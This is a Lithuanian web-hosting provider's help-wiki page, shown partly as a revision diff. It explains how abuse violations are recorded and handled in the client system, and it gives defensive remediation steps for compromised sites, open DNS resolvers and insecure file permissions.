'''1.''' Visų pirma įdėmiai peržiūrėkite visą [https://klientams.iv.lt/ klientų sistemoje] pateiktą informaciją - kai kuriais atvejais iš jos galima nustatyti, kokie serverio failai yra naudojami instrukcijų perdavimui nuotoliniu būdu ir atakos vykdymui prieš kitas svetaines ar serverius. Jeigu pateikiamos informacijos kiekis yra per mažas - peržiūrėkite į serverį įkeltus vėliausius failus, taip pat patikrinkite [https://www.iv.lt/pagalba/Web_serverio_i%C5%A1ra%C5%A1o_per%C5%BEi%C5%ABra Apache tarnybos išrašus] arba aktyvius serverio susijungimus (dedikuotame serveryje). Identifikavus atakos vykdyme dalyvaujančius failus, kiek įmanoma greičiau juos pašalinkite iš serverio.
 
'''1.''' Visų pirma įdėmiai peržiūrėkite visą [https://klientams.iv.lt/ klientų sistemoje] pateiktą informaciją - kai kuriais atvejais iš jos galima nustatyti, kokie serverio failai yra naudojami instrukcijų perdavimui nuotoliniu būdu ir atakos vykdymui prieš kitas svetaines ar serverius. Jeigu pateikiamos informacijos kiekis yra per mažas - peržiūrėkite į serverį įkeltus vėliausius failus, taip pat patikrinkite [https://www.iv.lt/pagalba/Web_serverio_i%C5%A1ra%C5%A1o_per%C5%BEi%C5%ABra Apache tarnybos išrašus] arba aktyvius serverio susijungimus (dedikuotame serveryje). Identifikavus atakos vykdyme dalyvaujančius failus, kiek įmanoma greičiau juos pašalinkite iš serverio.
 
</blockquote>
 
</blockquote>
171 eilutė: 212 eilutė:
 
'''4.''' Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. ''permissions'') '''777''' - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "''public_html''" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei '''644''' failams ir '''755''' direktorijoms.
 
'''4.''' Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. ''permissions'') '''777''' - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "''public_html''" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei '''644''' failams ir '''755''' direktorijoms.
 
</blockquote>
 
</blockquote>
 +
|}
  
====OPENRESOLVER====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>OPENRESOLVER</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
Šio pažeidimo pašalinimui turėtumėte DNS serverio nustatymus pakeisti taip, jog būtų pateikiami atsakymai tik toms zonoms, kurios yra aprašytos DNS serveryje. Jeigu Jūsų serveryje naudojamas "BIND" DNS serveris su tipine konfigūracija, reikia faile "''/etc/named.conf''" skiltyje "''options''" pridėti eilutę:
 
Šio pažeidimo pašalinimui turėtumėte DNS serverio nustatymus pakeisti taip, jog būtų pateikiami atsakymai tik toms zonoms, kurios yra aprašytos DNS serveryje. Jeigu Jūsų serveryje naudojamas "BIND" DNS serveris su tipine konfigūracija, reikia faile "''/etc/named.conf''" skiltyje "''options''" pridėti eilutę:
  
185 eilutė: 228 eilutė:
  
 
</blockquote>
 
</blockquote>
 +
|}
 +
 +
=== Ką daryti, jei į svetainę buvo įterpti žalingi failai/kenkėjiškas kodas? ===
 +
 +
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 +
|<strong>Žalingo kodo paieška</strong>
 +
|-
 +
| Jei į Jūsų svetainę buvo įterpti žalingi failai ar kenkėjiškas kodas, rekomenduojame atlikti šiuos veiksmus:
 +
 +
* Apribokite prieigą prie savo svetainės, svetainės .htaccess faile (public_html kataloge) sukurdami blokavimo taisyklę, kuri leis prie svetainės prisijungti tik iš Jūsų IP adreso: [https://www.iv.lt/pagalba/Prieigos_blokavimas https://www.iv.lt/pagalba/Prieigos_blokavimas]
 +
 +
Savo išorinį IP adresą galite matyti apsilankę adresu: [http://ip.serveriai.lt/ http://ip.serveriai.lt/]
 +
 +
* Pakeiskite visus su serveriu susijusius slaptažodžius ([https://www.iv.lt/pagalba/Serverio_slapta%C5%BEod%C5%BEio_priminimas pagrindinį serverio slaptažodį]), [https://www.iv.lt/pagalba/TVS_slapta%C5%BEod%C5%BEi%C5%B3_keitimas turinio valdymo sistemos slaptažodžius].
 +
 +
* Parsisiųskite visus savo svetainės failus į kompiuterį (patogiausia tai atlikti prisijungus prie serverio per FTP) ir praskenuokite juos. Ne visos antivirusinės programos skenuoja svetaines ir aptinka kenkėjišką kodą vienodai (antivirusinės programos gali nekorektiškai skenuoti PHP skriptus).
 +
 +
* Išvalykite žalingus failus/kenkėjišką kodą (pvz.: Wordpress galite naudoti įskiepį: https://wordpress.org/plugins/gotmls/ )
 +
 +
* Pašalinus žalingus failus svetainės failuose, įkelkite juos atgal į serverį. Atnaujinkite naudojamas turinio valdymo sistemas ir modulius.
 +
 +
* Nenaudokite nesaugių, senų ir neatnaujinamų įskiepių (angl. plugins).
 +
 +
* Nuolat atnaujinkite naudojamas turinio valdymo sistemas iki naujausios versijos.
 +
 +
* Atkreipkite dėmesį į turinio valdymo sistemų tiekėjų rekomendacijas svetainių apsaugojimui.
 +
 +
* Atblokavus svetainę .htaccess faile (pašalinus anksčiau sukurtą blokavimo taisyklę), ją galite praskenuoti šiais viešai prieinamais įrankiais:
 +
 +
https://sitecheck.sucuri.net/ <br />
 +
https://www.virustotal.com/
 +
|}
 +
 +
[[category:Talpinimo problemų sprendimas]]
 +
[[Kategorija:Sutartys, sąskaitos, mokėjimai]]

Dabartinė 11:58, 4 rugsėjo 2020 versija

Kas tai yra?

Internete, kaip ir kasdieniniame gyvenime, nuolat vykdomi įvairaus tipo pažeidimai nesilaikant nustatytų taisyklių. Tokiais veiksmais siekiama gauti naudos pasinaudojant neleistinomis priemonėmis. Ne išimtis ir mūsų teikiamos paslaugos – pasitaiko atvejų, kai įvairaus tipo pažeidimai atliekami pasinaudojant serverio resursais.

Internetiniai, robotai pasinaudodami nesaugia kontaktų forma, siunčia SPAM tipo laiškus atsitiktiniams gavėjams; pasinaudojant nesaugia programine įranga į talpinimo planą įkeliamas virusas, kuris gali platinti žalingą kodą svetainės lankytojų kompiuteriuose; patalpinamas apgaulingas turinys svetainėje su tikslu pasisavinti svarbius svetainės lankytojų prisijungimų duomenis – tai yra tik dalis pažeidimų, kurie vykdomi pasinaudojant serverio resursus. Dažniausiai šie veiksmai atliekami klientui net nepastebint. Kadangi tokia veikla turi įtakos mūsų paslaugų sklandžiam veikimui, mes informuojame paslaugos savininką nurodydami, kad buvo įvykdytas sutarties sąlygų pažeidimas pasinaudojant jų turima paslauga.

Kiekvienas mūsų įmonės klientas, užsakydamas paslaugas privalo patvirtinti, kad sutinka su sutarties sąlygomis. Šios taisyklės apibrėžia Vykdytojo (mūsų) ir Užsakovo (kliento) teises, pareigas bei atsakomybes sudarant ir vykdant sutartį. Užsakovui pažeidus bent vieną sutarties sąlygą yra fiksuojamas pažeidimas, suteikiant ribotą laikotarpį pažeidimo priežastims pašalinti ir imtis visų įmanomų priemonių, kad tokia situacija nepasikartotų ateityje. Problemos šalinimo laikotarpis priklauso nuo pažeidimo tipo ir veiklos vykdymo mąsto, bendru atveju nuo vienos iki septynių dienų.

Pažeidimai dažniausiai yra fiksuojami dėl žalingos, neteisėtos veiklos vykdymo mūsų teikiamose paslaugose, gavus skundą iš trečiųjų šalių į tam skirtą el. pašto dėžutę abuse@iv.lt arba remiantis serverių tarnybų išrašais, patvirtinančiais kenkėjiškos veiklos vykdymo aplinkybes. Incidentas gali būti fiksuojamas, tik esant įrodymams ir/arba skundui apie sutarties sąlygų nesilaikymą.

Ką daryti?

Jeigu gavote iš mūsų el. laišką ar (ir) SMS žinutę apie fiksuotą pražeidimą visų pirma prisijunkite prie klientų sistemos. Pažymėtina, kad dėl pažeidimų nėra konsultuojama telefonu, el. paštu ar inicijavus pokalbį gyvai (chat) – bendravimas vykdomas tik klientų sistemoje. Prisijungę prie klientų sistemos matysite pranešimą raudoname fone ir žemiau pateiktą nuorodą Peržiūrėti pažeidimus ir pateikti atsakymą. Atsidariusiame lange matysite šią lentelę:

Tablea.png


Aktyvaus pažeidimo lentelė:

  • Pažeidimas – nurodomas pažeidimo tipas bei numeris. Plačiau apie tipus kalbėsime sekančioje straipsnio dalyje.
  • Paslauga – konkreti Jūsų turima paslauga, kuriai fiksuotas pažeidimas.
  • Terminas – data iki kurios turite pateikti atsakymą į pažeidimą. Šis terminas yra ypač svarbus – jeigu nesulauksime atsakymo apie atliktus ar vykdomus darbus iki nurodyto termino, paslauga bus automatiškai išjungta ir įjungta tik sulaukus atsakymo bei pažeidimus sprendžiančiam specialistui peržiūrėjus situaciją.
  • Atsakyta – jeigu jau esate gavę papildomą atsakymą iš mūsų pažeidimų specialisto, nurodoma pateikto atsakymo data.
  • Uždaryta – specialistui įvertinus, kad sutarties sąlygų pažeidimas jau pašalintas, šiame laukelyje nurodoma pažeidimo uždarymo data.
  • Vertinimas – užbaigus pažeidimą šiame laukelyje atsiras nuoroda, kurioje galėsite pateikti savo atsiliepimą apie pažeidimo sprendimo metu suteiktą informaciją bei nurodyti papildomus pastebėjimus ar komentarus.

Pasirinkus Pažeidimas stulpelyje esančią nuorodą Jums atsidarys puslapis, kuriame matysite skundo informaciją, pateiktą skiltyje „Papildoma informacija“ bei bendrą informaciją apie patį pažeidimo tipą. Tam, kad būtų aiškiau, kokią vykdomą veiklą pastebėjome mūsų paslaugoje. Žemiau esančioje skiltyje Kokių tipų būna pažeidimai? pateikiame trumpus dažniausiai fiksuojamų pažeidimų aprašymus.

Nepaisant to, koks pažeidimo tipas buvo fiksuotas Jūsų paslaugai, rekomenduojame nedelsiant perduoti informaciją savo svetainės programuotojams ar paslaugos administratoriams. Sekite pažeidimo statusą iki tol, kol situacija bus uždaryta, nes kitu atveju – nesulaukus atsakymo ar patikslinimo – paslauga gali būti išjungta. Jeigu pažeidimą pašalinote ar tai atliko Jūsų administratorius, būtinai apie tai informuokite mus pateikdami atsakymą klientų sistemoje. Jeigu ir pasitarus su administratoriais bei peržiūrėjus informaciją mūsų pagalbos straipsnyje, nežinosite, kokių veiksmų reikėtų imtis – pateikite visus kylančius klausimus atsakydami į pažeidimą. Stengsimės pateikti detalius atsakymus į visus klausimus ir padėti kaip įmanoma greičiau išspręsti susiklosčiusią situaciją.

Kokių tipų būna pažeidimai?

Kaip reaguoti gavus pranešimą apie fiksuotą pažeidimą?

Kodėl buvo fiksuotas pažeidimas, jeigu jokių kenkėjiškų veiksmų neatlikau?

Rekomendacijos ir pastabos

Ką daryti, jei į svetainę buvo įterpti žalingi failai/kenkėjiškas kodas?